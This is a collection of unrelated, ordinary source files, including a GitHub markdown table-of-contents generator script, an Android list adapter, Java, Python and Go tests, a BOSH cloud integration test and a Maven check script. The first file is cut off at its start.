EXPECTED2=".*Account has existing key pair with ed25519:.+ public key.*"
if [[ ! "$RESULT2" =~ $EXPECTED2 ]]; then
echo FAILURE Unexpected output from near generate-key when key already exists
exit 1
fi
|
#!/usr/bin/env bash
#
# Steps:
#
# 1. Download corresponding html file for some README.md:
# curl -s $1
#
# 2. Discard rows where no substring 'user-content-' (github's markup):
# awk '/user-content-/ { ...
#
# 3.1 Get last number in each row like ' ... </span></a>sitemap.js</h1'.
# It's a level of the current header:
# substr($0, length($0), 1)
#
# 3.2 Get level from 3.1 and insert corresponding number of spaces before '*':
# sprintf("%*s", substr($0, length($0), 1)*3, " ")
#
# 4. Find head's text and insert it inside "* [ ... ]":
# substr($0, match($0, /a>.*<\/h/)+2, RLENGTH-5)
#
# 5. Find anchor and insert it inside "(...)":
# substr($0, match($0, "href=\"[^\"]+?\" ")+6, RLENGTH-8)
#
gh_toc_version="0.6.0"
gh_user_agent="gh-md-toc v$gh_toc_version"
#
# Download rendered into html README.md by its url.
#
#
gh_toc_load() {
local gh_url=$1
if type curl &>/dev/null; then
curl --user-agent "$gh_user_agent" -s "$gh_url"
elif type wget &>/dev/null; then
wget --user-agent="$gh_user_agent" -qO- "$gh_url"
else
echo "Please, install 'curl' or 'wget' and try again."
exit 1
fi
}
#
# Converts local md file into html by GitHub
#
# ➥ curl -X POST --data '{"text": "Hello world github/linguist#1 **cool**, and #1!"}' https://api.github.com/markdown
# <p>Hello world github/linguist#1 <strong>cool</strong>, and #1!</p>'"
gh_toc_md2html() {
local gh_file_md=$1
URL=https://api.github.com/markdown/raw
if [ -z "$GH_TOC_TOKEN" ]; then
TOKEN=$GH_TOC_TOKEN
else
TOKEN="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/token.txt"
fi
if [ -f "$TOKEN" ]; then
URL="$URL?access_token=$(cat $TOKEN)"
fi
# echo $URL 1>&2
OUTPUT="$(curl -s --user-agent "$gh_user_agent" \
--data-binary @"$gh_file_md" -H "Content-Type:text/plain" \
$URL)"
if [ "$?" != "0" ]; then
echo "XXNetworkErrorXX"
fi
if [ "$(echo "${OUTPUT}" | awk '/API rate limit exceeded/')" != "" ]; then
echo "XXRateLimitXX"
else
echo "${OUTPUT}"
fi
}
#
# Is passed string url
#
gh_is_url() {
case $1 in
https* | http*)
echo "yes";;
*)
echo "no";;
esac
}
#
# TOC generator
#
gh_toc(){
local gh_src=$1
local gh_src_copy=$1
local gh_ttl_docs=$2
local need_replace=$3
if [ "$gh_src" = "" ]; then
echo "Please, enter URL or local path for a README.md"
exit 1
fi
# Show "TOC" string only if working with one document
if [ "$gh_ttl_docs" = "1" ]; then
echo "Table of Contents"
echo "================="
echo ""
gh_src_copy=""
fi
if [ "$(gh_is_url "$gh_src")" == "yes" ]; then
gh_toc_load "$gh_src" | gh_toc_grab "$gh_src_copy"
if [ "${PIPESTATUS[0]}" != "0" ]; then
echo "Could not load remote document."
echo "Please check your url or network connectivity"
exit 1
fi
if [ "$need_replace" = "yes" ]; then
echo
echo "!! '$gh_src' is not a local file"
echo "!! Can't insert the TOC into it."
echo
fi
else
local rawhtml=$(gh_toc_md2html "$gh_src")
if [ "$rawhtml" == "XXNetworkErrorXX" ]; then
echo "Parsing local markdown file requires access to github API"
echo "Please make sure curl is installed and check your network connectivity"
exit 1
fi
if [ "$rawhtml" == "XXRateLimitXX" ]; then
echo "Parsing local markdown file requires access to github API"
echo "Error: You exceeded the hourly limit. See: https://developer.github.com/v3/#rate-limiting"
TOKEN="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/token.txt"
echo "or place github auth token here: $TOKEN"
exit 1
fi
local toc=`echo "$rawhtml" | gh_toc_grab "$gh_src_copy"`
echo "$toc"
if [ "$need_replace" = "yes" ]; then
local ts="<\!--ts-->"
local te="<\!--te-->"
local dt=`date +'%F_%H%M%S'`
local ext=".orig.${dt}"
local toc_path="${gh_src}.toc.${dt}"
local toc_footer="<!-- Added by: `whoami`, at: `date --iso-8601='minutes'` -->"
# http://fahdshariff.blogspot.ru/2012/12/sed-mutli-line-replacement-between-two.html
# clear old TOC
sed -i${ext} "/${ts}/,/${te}/{//!d;}" "$gh_src"
# create toc file
echo "${toc}" > "${toc_path}"
echo -e "\n${toc_footer}\n" >> "$toc_path"
# insert toc file
if [[ "`uname`" == "Darwin" ]]; then
sed -i "" "/${ts}/r ${toc_path}" "$gh_src"
else
sed -i "/${ts}/r ${toc_path}" "$gh_src"
fi
echo
echo "!! TOC was added into: '$gh_src'"
echo "!! Origin version of the file: '${gh_src}${ext}'"
echo "!! TOC added into a separate file: '${toc_path}'"
echo
fi
fi
}
#
# Grabber of the TOC from rendered html
#
# $1 — a source url of document.
# It's need if TOC is generated for multiple documents.
#
gh_toc_grab() {
# if closed <h[1-6]> is on the new line, then move it on the prev line
# for example:
# was: The command <code>foo1</code>
# </h1>
# became: The command <code>foo1</code></h1>
sed -e ':a' -e 'N' -e '$!ba' -e 's/\n<\/h/<\/h/g' |
# find strings that corresponds to template
grep -E -o '<a.*id="user-content-[^"]*".*</h[1-6]' |
# remove code tags
sed 's/<code>//g' | sed 's/<\/code>//g' |
# now all rows are like:
# <a id="user-content-..." href="..."><span ...></span></a> ... </h1
# format result line
# * $0 — whole string
# * last element of each row: "</hN" where N in (1,2,3,...)
echo -e "$(awk -v "gh_url=$1" '{
level = substr($0, length($0), 1)
text = substr($0, match($0, /a>.*<\/h/)+2, RLENGTH-5)
href = substr($0, match($0, "href=\"[^\"]+?\"")+6, RLENGTH-7)
print sprintf("%*s", level*3, " ") "* [" text "](" gh_url href ")" }' |
sed 'y/+/ /; s/%/\\x/g')"
}
#
# Returns filename only from full path or url
#
gh_toc_get_filename() {
echo "${1##*/}"
}
#
# Options hendlers
#
gh_toc_app() {
local app_name=$(basename $0)
local need_replace="no"
if [ "$1" = '--help' ] || [ $# -eq 0 ] ; then
echo "GitHub TOC generator ($app_name): $gh_toc_version"
echo ""
echo "Usage:"
echo " $app_name [--insert] src [src] Create TOC for a README file (url or local path)"
echo " $app_name - Create TOC for markdown from STDIN"
echo " $app_name --help Show help"
echo " $app_name --version Show version"
return
fi
if [ "$1" = '--version' ]; then
echo "$gh_toc_version"
echo
echo "os: `lsb_release -d | cut -f 2`"
echo "kernel: `cat /proc/version`"
echo "shell: `$SHELL --version`"
echo
for tool in curl wget grep awk sed; do
printf "%-5s: " $tool
echo `$tool --version | head -n 1`
done
return
fi
if [ "$1" = "-" ]; then
if [ -z "$TMPDIR" ]; then
TMPDIR="/tmp"
elif [ -n "$TMPDIR" -a ! -d "$TMPDIR" ]; then
mkdir -p "$TMPDIR"
fi
local gh_tmp_md
gh_tmp_md=$(mktemp $TMPDIR/tmp.XXXXXX)
while read input; do
echo "$input" >> "$gh_tmp_md"
done
gh_toc_md2html "$gh_tmp_md" | gh_toc_grab ""
return
fi
if [ "$1" = '--insert' ]; then
need_replace="yes"
shift
fi
for md in "$@"
do
echo ""
gh_toc "$md" "$#" "$need_replace"
done
echo ""
echo "Created by [gh-md-toc](https://github.com/ekalinin/github-markdown-toc)"
}
#
# Entry point
#
gh_toc_app "$@"
|
export const SMTP_CONFIG = {
service: "gmail",
host: "smtp.gmail.com",
port: 587,
user: '<EMAIL>',
pass: String(process.env.SMTP_PASSWORD)
} |
<html>
<head>
<title>Two Column Layout</title>
<style>
body {
margin: 0;
}
.top-nav {
background-color: #eee;
height: 50px;
padding: 20px;
}
.column-container {
display: flex;
justify-content: space-between;
}
.column {
width: 45%;
padding: 20px;
}
</style>
</head>
<body>
<div class="top-nav">
Top navigation bar
</div>
<div class="column-container">
<div class="column">
Column 1 content
</div>
<div class="column">
Column 2 content
</div>
</div>
</body>
</html> |
//Node.js module for customer contact information service
const express = require('express');
const router = express.Router();
// GET contacts
router.get('/contacts', function (req, res) {
// Fetch customer contact information from the data store
let contacts = getContactsFromDataStore();
// Send the data back as a response
res.status(200).json(contacts);
});
// POST contacts
router.post('/contacts', function (req, res) {
// Extract the contact information from the request body
const contact = req.body;
// Store the contact information to the data store
saveContactToDataStore(contact);
// Send back an empty response with status code 201 (Created)
res.sendStatus(201);
});
module.exports = router; |
<reponame>FredericDeRanter/iConsoleOS
package eu.le_tian.iConsoleOS.ui;
import android.annotation.SuppressLint;
import android.content.Context;
import android.content.res.Resources;
import android.util.Log;
import android.view.LayoutInflater;
import android.view.MotionEvent;
import android.view.View;
import android.view.ViewGroup;
import android.widget.AdapterView;
import android.widget.ImageButton;
import android.widget.ImageView;
import android.widget.Spinner;
import android.widget.TextView;
import androidx.annotation.NonNull;
import androidx.annotation.Nullable;
import androidx.core.view.MotionEventCompat;
import androidx.recyclerview.selection.ItemDetailsLookup;
import androidx.recyclerview.selection.SelectionTracker;
import androidx.recyclerview.widget.ItemTouchHelper;
import androidx.recyclerview.widget.RecyclerView;
import com.michaelmuenzer.android.scrollablennumberpicker.ScrollableNumberPicker;
import com.michaelmuenzer.android.scrollablennumberpicker.ScrollableNumberPickerListener;
import java.util.ArrayList;
import java.util.List;
import eu.le_tian.iConsoleOS.R;
import eu.le_tian.iConsoleOS.customtimepicker.CustomTimePicker2;
import eu.le_tian.iConsoleOS.data.ExerciseProfileData;
public class ExerciseProfileDataAdapter extends RecyclerView.Adapter<ExerciseProfileDataAdapter.ExerciseProfileDataViewHolder> {
String TAG = "ExerciseProfileDataAdapter";
private SelectionTracker<Long> selectionTracker;
private ExerciseProfileFragment mFragment;
private Resources res;
private final LayoutInflater mInflater;
private List<ExerciseProfileData> mExerciseProfileDataList;
private List<ExerciseProfileData> exerciseProfileDataRemovedList;
private ItemTouchHelper itemTouchHelper;
private final OnStartDragListener mDragStartListener;
private onValueChangeListener valueChangeListener = new onValueChangeListener() {
@Override
public void onValueChange(int position, int value, int type) {
/**In this listener we need to update the mExerciseProfileDataList with the changed values**/
ExerciseProfileData original = mExerciseProfileDataList.get(position);
switch (type) {
case 1:
/**type: 1 is level*/
original.setRelativeLevel(value);
break;
case 2:
/**type: 2 is duration*/
original.setDuration(value);
break;
case 3:
original.setDataType(value);
/**type: 3 is spinner*/
break;
case 4:
/** type: 4 is button up (value 2) or down (value 1)
** first check if it can go up or down
**/
int maxPosition = mExerciseProfileDataList.size() - 1;
long originalPos = original.getSortOrder();
int originalDataType = original.getDataType();
Log.e(TAG, "maxPosition: " + maxPosition + " | originalPos: " + originalPos + " | position: " + position + " | type: " + original.getDataType() + " | order in List : " + mExerciseProfileDataList.indexOf(original));
if (value == 1) { //Down
if (position < maxPosition) {
//can move down
ExerciseProfileData exerciseProfileDataDown = mExerciseProfileDataList.get(position + 1);
//check if next position has same datatype (then can move)
if (exerciseProfileDataDown.getDataType() == originalDataType) {
//move items
exerciseProfileDataDown.setSortOrder(position);
original.setSortOrder(position + 1);
mExerciseProfileDataList.remove(position);
mExerciseProfileDataList.add(position + 1, original);
Log.e(TAG, "moving item down");
notifyItemRangeChanged(position, 2);
//notifyItemMoved(position, position+1);
//notifyItemMoved(position+1, position);
} else {
//can't move set SortOrder back to what it was
exerciseProfileDataDown.setSortOrder(position + 1);
original.setSortOrder(position);
}
}
} else { //Up
if (position > 1) {
//can move up
ExerciseProfileData exerciseProfileDataUp = mExerciseProfileDataList.get(position - 1);
if (exerciseProfileDataUp.getDataType() == originalDataType) {
//move items
exerciseProfileDataUp.setSortOrder(position);
original.setSortOrder(position - 1);
mExerciseProfileDataList.remove(position);
mExerciseProfileDataList.add(position - 1, original);
Log.e(TAG, "moving item up");
notifyItemRangeChanged(position - 1, 2);
//notifyItemMoved(position-1, position);
} else {
//can't move set SortOrder back to what it was
exerciseProfileDataUp.setSortOrder(position - 1);
original.setSortOrder(position);
}
}
}
break;
}
}
};
public void setSelectionTracker(SelectionTracker<Long> selectionTracker) {
this.selectionTracker = selectionTracker;
}
static class Details extends ItemDetailsLookup.ItemDetails<Long> {
long position;
Details() {
}
@Override
public int getPosition() {
Log.d("DetailsClass", "getPosition: " + position);
return (int) position;
}
@Nullable
@Override
public Long getSelectionKey() {
Log.d("DetailsClass", "getSelectionKey " + position);
return position;
}
}
static class DetailsLookup extends ItemDetailsLookup<Long> {
private RecyclerView recyclerView;
DetailsLookup(RecyclerView recyclerView) {
this.recyclerView = recyclerView;
}
@Nullable
@Override
public ItemDetails<Long> getItemDetails(@NonNull MotionEvent e) {
View view = recyclerView.findChildViewUnder(e.getX(), e.getY());
if (view != null) {
RecyclerView.ViewHolder viewHolder = recyclerView.getChildViewHolder(view);
if (viewHolder instanceof ExerciseProfileDataViewHolder) {
final ExerciseProfileDataViewHolder exerciseProfileDataViewHolder = (ExerciseProfileDataViewHolder) viewHolder;
return exerciseProfileDataViewHolder.getItemDetails();
}
}
return null;
}
}
class ExerciseProfileDataViewHolder extends RecyclerView.ViewHolder {
private final Spinner spProfileDataType;
private final TextView tvProfileDataID;
private final TextView tvProfileDataSortOrder;
private final TextView tvProfileDataParentID;
private final CustomTimePicker2 tpProfileDataDuration;
private final ScrollableNumberPicker npProfileDataLevel;
private final ImageButton btUp;
private final ImageButton btDown;
//public final ImageView handle;
private Details details;
private ExerciseProfileDataViewHolder(View itemView, final onValueChangeListener listener) {
super(itemView);
spProfileDataType = itemView.findViewById(R.id.exPrDataType);
tvProfileDataID = itemView.findViewById(R.id.exPrDataID);
tvProfileDataSortOrder = itemView.findViewById(R.id.exPrDataOrder);
tpProfileDataDuration = itemView.findViewById(R.id.exPrDataDuration);
npProfileDataLevel = itemView.findViewById(R.id.exPrDataLevel);
tvProfileDataParentID = itemView.findViewById(R.id.exPrDataParentID);
btUp = itemView.findViewById(R.id.exPrDataButtonUp);
btDown = itemView.findViewById(R.id.exPrDataButtonDown);
//handle = itemView.findViewById(R.id.handle);
details = new Details();
Log.v(TAG, "init adapter");
npProfileDataLevel.setListener(value -> listener.onValueChange(getLayoutPosition(), value, 1));
tpProfileDataDuration.setOnValueChangeListener(totalSeconds -> listener.onValueChange(getLayoutPosition(), totalSeconds, 2));
spProfileDataType.setOnItemSelectedListener(new AdapterView.OnItemSelectedListener() {
@Override
public void onItemSelected(AdapterView<?> parent, View view, int position, long id) {
listener.onValueChange(getLayoutPosition(), position, 3);
}
@Override
public void onNothingSelected(AdapterView<?> parent) {
//nothing happens
}
});
btUp.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
listener.onValueChange(getLayoutPosition(), 2, 4);
}
});
btDown.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
listener.onValueChange(getLayoutPosition(), 1, 4);
}
});
// holder.handle.setOnTouchListener(new View.OnTouchListener() {
// @Override
// public boolean onTouch(View v, MotionEvent event) {
// if (event.getActionMasked() ==
// MotionEvent.ACTION_DOWN) {
// mDragStartListener.onStartDrag(holder);
// }
// return false;
// }
// });
}
void bind(final ExerciseProfileData exerciseProfileData, int position) {
details.position = position;
tvProfileDataID.setText(Long.toString(exerciseProfileData.getExerciseProfileDataID()));
tvProfileDataParentID.setText(Long.toString(exerciseProfileData.getParentExerciseProfileID()));
tvProfileDataSortOrder.setText(Long.toString(exerciseProfileData.getSortOrder()));
tpProfileDataDuration.setTotalSeconds(exerciseProfileData.getDuration());
npProfileDataLevel.setValue(exerciseProfileData.getRelativeLevel());
spProfileDataType.setSelection(exerciseProfileData.getDataType());
}
Details getItemDetails() {
return details;
}
}
ExerciseProfileDataAdapter(Context context, ExerciseProfileFragment fragment, OnStartDragListener dragStartListener) {
mInflater = LayoutInflater.from(context);
this.mFragment = fragment;
this.res = fragment.getResources();
setHasStableIds(true);
mDragStartListener = dragStartListener;
}
@Override
public ExerciseProfileDataViewHolder onCreateViewHolder(ViewGroup parent, int viewType) {
View itemView = mInflater.inflate(R.layout.recyclerview_epdataitem, parent, false);
return new ExerciseProfileDataViewHolder(itemView, valueChangeListener);
}
@Override
public void onBindViewHolder(@NonNull ExerciseProfileDataViewHolder holder, int position) {
if (mExerciseProfileDataList != null) {
Log.v(TAG, "onBindViewHolder found data for ProfileList");
holder.bind(mExerciseProfileDataList.get(position), position);
} else {
// Covers the case of data not being ready yet.
Log.d(TAG, "found nothing in db");
//holder.exerciseProfileItemView.setText("No Items found");
}
}
List<ExerciseProfileData> getmExerciseProfileDataList() {
return mExerciseProfileDataList;
}
List<ExerciseProfileData> getExerciseProfileDataRemovedListAndClear() {
List<ExerciseProfileData> exerciseProfileDataListTemp = exerciseProfileDataRemovedList;
if (exerciseProfileDataRemovedList != null) {
exerciseProfileDataRemovedList.clear();
}
return exerciseProfileDataListTemp;
}
void clearExerciseProfileDataRemoved() {
if (exerciseProfileDataRemovedList != null) {
exerciseProfileDataRemovedList.clear();
}
}
public void setItemTouchHelper(ItemTouchHelper itemTouchHelper) {
this.itemTouchHelper = itemTouchHelper;
}
void setmExerciseProfileDataList(List<ExerciseProfileData> exerciseProfileDataList) {
mExerciseProfileDataList = exerciseProfileDataList;
notifyDataSetChanged();
}
void addToExerciseProfileDataList(ExerciseProfileData exerciseProfileData) {
mExerciseProfileDataList.add(exerciseProfileData);
notifyItemInserted(mExerciseProfileDataList.size());
}
public ExerciseProfileData getExerciseProfileDataForPosition(long mPosition) {
ExerciseProfileData returnValue = null;
returnValue = mExerciseProfileDataList.get((int) mPosition);
return returnValue;
}
public void onItemDismiss(int position) {
ExerciseProfileData exerciseProfileData = mExerciseProfileDataList.remove(position);
if (exerciseProfileDataRemovedList == null) {
exerciseProfileDataRemovedList = new ArrayList<ExerciseProfileData>();
}
exerciseProfileDataRemovedList.add(exerciseProfileData);
notifyItemRemoved(position);
}
public void onItemMove(int fromPosition, int toPosition) {
/**Moving items around**/
ExerciseProfileData tmp = mExerciseProfileDataList.remove(fromPosition);
Log.d(TAG, "Moving item: " + fromPosition + "to : " + toPosition);
Log.d(TAG, "Moving item: " + tmp.getSortOrder() + "level : " + tmp.getRelativeLevel());
//mExerciseProfileDataList.add(toPosition, tmp);
mExerciseProfileDataList.add(toPosition > fromPosition ? toPosition - 1 : toPosition, tmp);
//notifyDataSetChanged();
}
@Override
public long getItemId(int position) {
return position;
}
@Override
public int getItemCount() {
if (mExerciseProfileDataList != null) {
return mExerciseProfileDataList.size();
} else return 0;
}
interface onValueChangeListener {
void onValueChange(int position, int value, int type);
/** type: 1 is level
** type: 2 is duration
** type: 3 is spinner
** type: 4 is button up (value 2) or down (value 1)
* */
}
interface OnStartDragListener {
/**
* Called when a view is requesting a start of a drag.
*
* @param viewHolder The holder of the view to drag.
*/
void onStartDrag(RecyclerView.ViewHolder viewHolder);
}
}
|
#!/bin/sh
#
# Author: Aaron Voisine <aaron@voisine.org>
if [ "$DISPLAY"x == "x" ]; then
echo :0 > /tmp/display.$UID
else
echo $DISPLAY > /tmp/display.$UID
fi
|
package net.ninjacat.omg.bytecode.reference;
import io.vavr.collection.List;
import net.ninjacat.omg.bytecode.AsmPatternCompiler;
import net.ninjacat.omg.conditions.ConditionMethod;
import net.ninjacat.omg.conditions.InCondition;
import net.ninjacat.omg.conditions.PropertyCondition;
import net.ninjacat.omg.errors.CompilerException;
import net.ninjacat.omg.patterns.PropertyPattern;
import org.junit.Test;
import static org.hamcrest.Matchers.is;
import static org.junit.Assert.assertThat;
public class ByteCompilerTest {
@Test
public void shouldMatchSimpleEqPattern() {
final PropertyCondition<Byte> condition = createPropertyCondition(ConditionMethod.EQ, (byte) 42);
final PropertyPattern<ByteTest> pattern = AsmPatternCompiler.forClass(ByteTest.class).build(condition);
assertThat(pattern.matches(new ByteTest((byte) 42)), is(true));
assertThat(pattern.matches(new ByteTest((byte) 24)), is(false));
}
@Test
public void shouldMatchSimpleNeqPattern() {
final PropertyCondition<Byte> condition = createPropertyCondition(ConditionMethod.NEQ, (byte) 42);
final PropertyPattern<ByteTest> pattern = AsmPatternCompiler.forClass(ByteTest.class).build(condition);
assertThat(pattern.matches(new ByteTest((byte) 42)), is(false));
assertThat(pattern.matches(new ByteTest((byte) 24)), is(true));
}
@Test
public void shouldMatchSimpleGtPattern() {
final PropertyCondition<Byte> condition = createPropertyCondition(ConditionMethod.GT, (byte) 42);
final PropertyPattern<ByteTest> pattern = AsmPatternCompiler.forClass(ByteTest.class).build(condition);
assertThat(pattern.matches(new ByteTest((byte) 42)), is(false));
assertThat(pattern.matches(new ByteTest((byte) 84)), is(true));
}
@Test
public void shouldMatchSimpleLtPattern() {
final PropertyCondition<Byte> condition = createPropertyCondition(ConditionMethod.LT, (byte) 42);
final PropertyPattern<ByteTest> pattern = AsmPatternCompiler.forClass(ByteTest.class).build(condition);
assertThat(pattern.matches(new ByteTest((byte) 42)), is(false));
assertThat(pattern.matches(new ByteTest((byte) 21)), is(true));
}
@Test
public void shouldMatchInPattern() {
final InCondition<Byte> condition = new InCondition<>("byteField", List.of((byte)42, (byte)43).asJava());
final PropertyPattern<ByteTest> pattern = AsmPatternCompiler.forClass(ByteTest.class).build(condition);
assertThat(pattern.matches(new ByteTest((byte) 42)), is(true));
assertThat(pattern.matches(new ByteTest((byte) 21)), is(false));
}
@Test(expected = CompilerException.class)
public void shouldFailMatchPattern() {
final PropertyCondition<Byte> condition = createPropertyCondition(ConditionMethod.MATCH, (byte) 42);
AsmPatternCompiler.forClass(ByteTest.class).build(condition);
}
@Test(expected = CompilerException.class)
public void shouldFailRegexPattern() {
final PropertyCondition<Byte> condition = createPropertyCondition(ConditionMethod.REGEX, (byte) 42);
AsmPatternCompiler.forClass(ByteTest.class).build(condition);
}
private static PropertyCondition<Byte> createPropertyCondition(final ConditionMethod method, final Byte value) {
return new PropertyCondition<Byte>() {
@Override
public String repr(final int level) {
return "";
}
@Override
public ConditionMethod getMethod() {
return method;
}
@Override
public String getProperty() {
return "byteField";
}
@Override
public Byte getValue() {
return value;
}
};
}
public static class ByteTest {
private final Byte byteField;
ByteTest(final byte byteField) {
this.byteField = byteField;
}
public Byte getByteField() {
return byteField;
}
}
} |
def α_L(x):
if x < 0.5:
return 1 - x
else:
return x
def derivative_v_L(x):
if x < 0.5:
return -1
else:
return 1
# Test cases for α_L function
def test_α_L_regular_case():
assert α_L(0.3) == 0.7
def test_α_L_edge_left():
assert α_L(0) == 1
def test_α_L_edge_right():
assert α_L(1) == 0
# Test cases for derivative_v_L function
def test_derivative_v_L_regular_case():
assert derivative_v_L(0.3) == -1
def test_derivative_v_L_edge_left():
assert derivative_v_L(0) == -1
def test_derivative_v_L_edge_right():
assert derivative_v_L(1) == 1 |
<reponame>zc2638/drone-control
/**
* Created by zc on 2020/11/23.
*/
package database
import (
"database/sql"
"strings"
"time"
)
type Config struct {
Driver string `json:"driver"`
Datasource string `json:"datasource"`
Debug bool `json:"debug"`
}
func dealDriver(driver string) string {
driver = strings.TrimSpace(driver)
switch driver {
case "mysql":
return "mysql"
case "postgres":
return "postgres"
default:
return "sqlite3"
}
}
func New(cfg *Config) (*sql.DB, error) {
if strings.TrimSpace(cfg.Datasource) == "" {
cfg.Datasource = "control.db"
}
db, err := sql.Open(dealDriver(cfg.Driver), cfg.Datasource)
if err != nil {
return nil, err
}
db.SetMaxIdleConns(10) // 最大空闲连接数
db.SetMaxOpenConns(100) // 最大打开连接数
db.SetConnMaxLifetime(time.Hour * 6) // 连接最长存活时间
return db, nil
}
|
<gh_stars>0
/*
* Copyright (C) 2017-2017 Alibaba Group Holding Limited
*/
package integration
import (
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
"bosh-alicloud-cpi/mock"
"time"
)
var _ = Describe("integration:disk", func() {
It("can run the disk lifecycle", func() {
By("create vm")
in := mock.NewBuilder(`{
"method": "create_vm",
"arguments": [
"be387a69-c5d5-4b94-86c2-978581354b50",
"${STEMCELL_ID}",
{
"ephemeral_disk": {
"size": "40_960",
"category": "cloud_efficiency"
},
"instance_name": "test-cc",
"instance_type": "ecs.n4.small",
"system_disk": {
"size": "61_440",
"category": "cloud_efficiency"
}
},
{
"private": {
"type": "manual",
"ip": "${INTERNAL_IP}",
"netmask": "${INTERNAL_NETMASK}",
"cloud_properties": {
"security_group_ids": ["${SECURITY_GROUP_ID}"],
"vswitch_id": "${VSWITCH_ID}"
},
"default": [
"dns",
"gateway"
],
"dns": [
"8.8.8.8"
],
"gateway": "${INTERNAL_GW}"
}
},
[],
{}
],
"context": {
"director_uuid": "911133bb-7d44-4811-bf8a-b215608bf084"
}
}`).P("STEMCELL_ID", stemcellId).
P("SECURITY_GROUP_ID", securityGroupId).
P("VSWITCH_ID", vswitchId).
P("INTERNAL_IP", internalIp).
P("INTERNAL_NETMASK", internalNetmask).
P("INTERNAL_GW", internalGw).
ToBytes()
r := caller.Run(in)
Expect(r.GetError()).NotTo(HaveOccurred())
instCid := r.GetResultString()
By("create disk")
diskCid, err := caller.Call("create_disk", 1024, "{}", instCid)
Expect(err).NotTo(HaveOccurred())
By("sleep for awhile")
time.Sleep(time.Duration(90) * time.Second)
By("resize disk")
_, err = caller.Call("resize_disk", diskCid, 30720)
Expect(err).NotTo(HaveOccurred())
By("attach disk")
_, err = caller.Call("attach_disk", instCid, diskCid)
Expect(err).NotTo(HaveOccurred())
By("set disk meta data")
r = caller.Run(mock.NewBuilder(`{
"method": "set_disk_metadata",
"arguments": [
"${DISK_ID}",
{
"director": "my-bosh",
"deployment": "cf",
"instance_id": "${INST_ID}",
"job": "consul",
"instance_index": "0",
"instance_name": "consul/441e940e-2ffe-4208-993e-3e5f888e2b7e",
"attached_at": "2017-11-03T06:21:27Z"
}
],
"context": {
"director_uuid": "d5555ed6-7688-4aae-9dff-4c4507042f3d",
"request_id": "cpi-201248"
}
}`).P("INST_ID", instCid).P("DISK_ID", diskCid).ToBytes())
Expect(r.GetError()).NotTo(HaveOccurred())
By("snapshot disk")
ssid, err := caller.Call("snapshot_disk", diskCid, nil)
Expect(err).NotTo(HaveOccurred())
By("detach disk")
_, err = caller.Call("detach_disk", instCid, diskCid)
Expect(err).NotTo(HaveOccurred())
By("delete disk")
_, err = caller.Call("delete_disk", diskCid)
Expect(err).NotTo(HaveOccurred())
By("delete snapshot")
_, err = caller.Call("delete_snapshot", ssid)
Expect(err).NotTo(HaveOccurred())
By("delete vm")
_, err = caller.Call("delete_vm", instCid)
Expect(err).NotTo(HaveOccurred())
})
})
|
#include <msmq.h>
#include <msmqobj.h>
void EnsureQueueExists(String^ path)
{
try
{
if (!MessageQueue::Exists(path))
{
MessageQueue^ queue = MessageQueue::Create(path);
// Optionally, set queue properties or permissions here
}
}
catch (MessageQueueException^ e)
{
// Handle any specific message queue exceptions here
// For example: log the error, retry, or throw a custom exception
}
catch (Exception^ e)
{
// Handle any other general exceptions here
// For example: log the error, retry, or throw a custom exception
}
} |
#!/bin/sh
check_headers () {
EXPECT=" * Copyright (c) "
LEXPECT=${#EXPECT}
for file in $(find . -type f -name "*.java"); do
line2=$(head -n 2 "${file}" | tail -n 1)
l2start=$(expr substr "$line2" 1 ${LEXPECT})
if [ "${EXPECT}" != "${l2start}" ]; then
echo "no copyright notice in: $file"
fi
done
}
check_updates () {
mvn -B -U versions:display-dependency-updates versions:display-plugin-updates versions:display-property-updates
}
check_coverage() {
mvn -B cobertura:cobertura
}
check_coverage_xml() {
mvn -B cobertura:cobertura -Dcobertura.report.format=xml
}
case $1 in
headers)
check_headers
;;
updates)
check_updates
;;
coverage)
check_coverage
;;
coverage_xml)
check_coverage_xml
;;
all)
check_headers
check_updates
check_coverage
;;
*)
echo "$0 <which check>"
echo "checks:"
echo " all"
echo " headers"
echo " updates"
echo " coverage"
echo " coverage_xml"
;;
esac
|
<reponame>sevki/bazel<gh_stars>1000+
// Protocol Buffers - Google's data interchange format
// Copyright 2008 Google Inc. All rights reserved.
// https://developers.google.com/protocol-buffers/
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
// Author: <EMAIL> (<NAME>)
// Based on original Protocol Buffers design by
// <NAME>, <NAME>, and others.
#include <google/protobuf/stubs/hash.h>
#include <limits>
#include <map>
#include <queue>
#include <vector>
#include <google/protobuf/stubs/logging.h>
#include <google/protobuf/stubs/common.h>
#include <google/protobuf/compiler/cpp/cpp_helpers.h>
#include <google/protobuf/io/printer.h>
#include <google/protobuf/io/zero_copy_stream.h>
#include <google/protobuf/stubs/strutil.h>
#include <google/protobuf/stubs/substitute.h>
namespace google {
namespace protobuf {
namespace compiler {
namespace cpp {
namespace {
static const char kAnyMessageName[] = "Any";
static const char kAnyProtoFile[] = "google/protobuf/any.proto";
